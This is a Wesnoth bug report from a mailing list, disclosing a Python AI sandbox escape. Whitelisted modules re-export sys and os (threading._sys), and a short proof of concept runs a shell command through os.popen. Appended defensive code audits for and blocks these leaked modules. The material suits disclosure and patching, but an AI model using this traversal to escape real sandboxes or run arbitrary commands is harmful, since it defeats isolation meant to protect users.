URL:
<http://gna.org/bugs/?13048>
Summary: Hole in Python AI sandbox permits arbitrary code execution
Project: Battle for Wesnoth
Submitted by: dfranke
Submitted on: Sunday 02/22/2009 at 08:45
Category: Bug
Severity: 6 - Security
Priority: 5 - Normal
Item Group: Artificial Intelligence
Status: None
Privacy: Private
Assigned to: None
Originator Email:
Open/Closed: Open
Discussion Lock: Any
Release: 1.5.10+svn
Operating System: Linux
_______________________________________________________
Details:
In Python, if module A imports module B and module B imports module C, A can
access C by referencing it as 'B.C'.
This permits Wesnoth Python AIs to escape their sandbox, because some
whitelisted modules import other modules that are unsafe. For example, in
Python 2.5.2, 'threading', which is a whitelisted module, contains the line
'import sys as _sys'.
Here's a proof-of-concept that gives Wesnoth an interesting new soundtrack,
assuming /usr/bin/firefox exists:
#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.youtube.com/watch?v=oHg5SJYRHA0'")
f.close()
Take note of bug #13047 before using multiplayer to test this. Until that
bug is fixed, you can just add this code into kamikaze.py in Descent into
Darkness and skip to the third scenario.
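One defender-side mitigation for the attribute traversal described above, as an added example that is not part of the report and not Wesnoth's own sandbox code: an audit helper that lists the module objects a whitelisted module re-exports, and a read-only proxy that exposes only public, non-module attributes, so a path like threading._sys no longer resolves. The names ModuleProxy, leaked_modules, reachable and demo are chosen here; the check assumes CPython 3, whose threading module still does 'import sys as _sys'.

```python
import types
import threading  # whitelisted in the report; CPython 3 still does 'import sys as _sys'


def leaked_modules(module):
    """Audit: names in `module` bound to module objects, i.e. attribute paths by
    which sandboxed code can reach a non-whitelisted module (threading._sys)."""
    return sorted(name for name, value in vars(module).items()
                  if isinstance(value, types.ModuleType))


class ModuleProxy(object):
    """Expose a whitelisted module minus the modules it re-exports: only public
    names (no leading underscore) whose value is not a module resolve.
    Added illustration of the mitigation, not Wesnoth's own sandbox code."""
    __slots__ = ("_module",)

    def __init__(self, module):
        object.__setattr__(self, "_module", module)

    def __getattribute__(self, name):
        if name.startswith("_"):
            raise AttributeError("%r is not exposed by the sandbox" % name)
        value = getattr(object.__getattribute__(self, "_module"), name)
        if isinstance(value, types.ModuleType):
            raise AttributeError("module %r is not exposed by the sandbox" % name)
        return value

    def __setattr__(self, name, value):  # keep AI code from planting attributes
        raise AttributeError("sandboxed modules are read-only")


def reachable(obj, path):
    """Follow a dotted attribute path the way AI code would; True if it resolves."""
    try:
        for part in path.split("."):
            obj = getattr(obj, part)
    except AttributeError:
        return False
    return True


def demo():
    """Audit 'threading' and compare raw-module access with proxied access."""
    safe = ModuleProxy(threading)
    return {"leaked": leaked_modules(threading),
            "sys_via_raw_module": reachable(threading, "_sys.modules"),
            "sys_via_proxy": reachable(safe, "_sys.modules"),
            "thread_via_proxy": reachable(safe, "Thread")}
```

Running demo() shows '_sys' among the modules threading leaks, reachable through the raw module but not through the proxy, while public names such as Thread still resolve.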
_______________________________________________________
Reply to this item at:
<http://gna.org/bugs/?13048>
_______________________________________________
Message sent via/by Gna!
http://gna.org/
_______________________________________________
Wesnoth-bugs mailing list
[email protected]
https://mail.gna.org/listinfo/wesnoth-bugs